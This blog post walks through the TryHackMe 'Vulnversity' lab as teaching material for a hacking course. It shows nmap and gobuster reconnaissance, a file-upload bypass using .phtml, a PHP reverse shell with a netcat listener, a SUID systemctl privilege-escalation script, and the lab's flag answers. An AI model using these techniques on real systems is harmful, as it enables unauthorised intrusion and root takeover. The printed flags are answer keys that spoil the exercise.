Powered by Blogger.
Home » , » GCAH 2 OWASP WEH [THM Vulnversity A Short Pentest Challenge ]

GCAH 2 OWASP WEH [THM Vulnversity A Short Pentest Challenge ]

Written By Akademy on Monday, February 17, 2020 | 9:40 PM

Tài liệu thực hành dành cho lớp  GCAH Level 2 OWASP Web Hacking {Live Training Vào Thứ 5 Hàng Tuần]

Today, I am going for a vulnerable machine challenge. This challenge is created by the one and the only one, tryhackme itself. Vulnversity or known as ‘vulnerable university’ (i guess) covers 3 basic penetration test phases which are
  • Reconnaissance (Task 2 and 3)
  • Threat modelling and vulnerability identification (Task 4)
  • Exploitation (Task 4 and 5)
Let’s move on to our first given task!

Task 1: Deploy and connect the machine

Record down the machine IP and your tunnel IP address. These IP addresses are very useful for the later challenge.

Task 2: Reconnaissance (Part 1 – nmap)

Reconnaissance is a pentest phase where the tester performs information gathering. Tools such as nmap, gobuster, dirbuster, Maltago, Sparta, e.t.c are used to gather all the available information of a machine. This information can be an open port, range of IP address, potential vulnerability and user information.
For this challenge, I am going to use nmap to scan all the available information on the deployed machine.

Task 2-2: Number of open port

Using the following nmap command, a total of 6 open ports can be detected.
$ nmap -Pn -p-10000 -A -v <MACHINE IP>
Explanation on the flag:
  • -Pn: Just scan for open ports
  • -p-10000: Scan first 10000 ports
  • -A: Enable OS detection, execute in-build script
  • -v: Verbose mode (Displaying all the scanning processes and results)

Answer: 6

Task 2-3: Squid proxy version

By using the nmap scanner, I am able to identify the version.

Answer: 3.5.12

Task 2-4: The meaning of -p-400 flag

By referring to the task 2-2, the flag means scanning the first 400 ports.
Answer: 400

Task 2-5: What will not be resolved by -n flag

Referring to the nmap documentation, the DNS will not be resolved by using -n flag.
Answer: DNS

Task 2-6: OS detection

By using the nmap scanner, I am able to identify the OS of the machine.

Answer: Ubuntu

Task 2-7: Port that run by the web server.

Web servers are not always run on the port 80, that is why we miss it out sometime. The webserver is located on port 3333.
Answer: 3333

Task 3: Reconnaissance (Part 2 – gobuster)

Since we know the webserver port of the machine. Let us look into more detail and find the hidden directory of the webserver. You can use gobuster or dirbuster to complete this task. For the sake of simplicity, I’m going to follow the description.
To locate the hidden directory of the webserver, use the following command
$ gobuster dir -u http://<MACHINE IP>:3333 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
Explanation on the flag:
  • -u: target URL
  • -w: wordlists

Task 3-2: The hidden directory

The hidden directory is called ‘internal’ where we can upload a file to perform a potential exploitation.

Answer: /internal/

Task 4: Threat modeling and vulnerability identification

Now, we have found a form to upload files. Maybe we can leverage this form and execute our payload that will lead to compromising the webserver.

Task 4-1: Blocked file

By uploading a few files with a different extension, it seems that the webserver blocked file with .php extension. PHP files are the most common file used to execute the payload on the webserver which is blocked by the server and we have to think another way around.

Answer: .php

Task 4-2: Burp suite

The following task required the use of Burp suite. Burp suite is a graphical tool for testing web application security. Be sure to check it out.

Task 4-3: Burp suite in Intruder mode

Without further ado, we are going to guess the other PHP files that are accepted by the webserver. The extension can be .php3, .php4, .php5 and .phtml. Create a wordlist of the extension and upload to the server.

After that, intercept the traffic and send it to the intruder as shown in the figure below.

Navigate to the Intruder tab and then position tab. Find the uploaded file name as shown in the figure below.

After located the filename, change the extension one by one (from .php3 to .phtml) as shown in the figure below

Then start the attack. The attack return a success response by uploading the file with .phtml extension.

Answer: .phtml

Task 4-4: Exploitation

Since we know .phtml file is a potential PHP file for our payload. Now we are going to use a PHP reverse shell as our payload. I am going to break down this task into steps:

  • Step3: Rename the file into reverse-php.phtml
  • Step4: Open a listener using netcat
$ nc -lvnp 1234
  • Step5: Upload reverse-php.phtml to the webserver
  • Step6: Navigate to the following IP address, http://<MACHINE IP>:3333/internal/uploads/reverse-php.phtml which will execute your payload
  • Step7: A netcat session will be generated

Task 4-5: Who is on the server

On the reverse shell, type the following command to locate the user.
$ ls /home

Answer: bill

Task 4-6: Capture bill’s flag

On the reverse shell, type the following command for the flag
$ cat /home/bill/user.txt

Answer: 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: Exploitation (Superuser)

Task 5-1: Where is the SUID files?

The SUID files is located on /bin/systemctl
Answer: /bin/systemctl

Task 5-2: Capture the root flag

This task is a little bit challenging. A big thanks to Paradox and Darkstar from the tryhackme discord channel, I’m able to solve this challenge by using a tool called GTFObins. You hear me, is GTFO or get the freakout 🙂
This task requires systemctl from GTFObins. At first glance, you are given two choices to exploit the machine using either SUID or SUDO. However, the machine can’t work with sudo way and we have to go for SUID way.
For SUID way, you need to mess around with the shell. Do not let the sudo trick you! You can run the shell in the /bin directory without copying or cp the /bin/systemctl. Here are the steps:
  • Step1: Move to /bin directory
$ cd /bin
  • Step2: Open a shell right inside the /bin
$ sh
  • Step3: Copy the script into the shell
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
  • Step4: Read the content in /tmp/output
$ cat /tmp/output

Voila, you get your final flag of the challenge
Answer: a58ff8579f0a9270368d33a9966c7fd5


Alright, this is the end of the challenge for vulnversity. See you again !!
Share this article :


Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT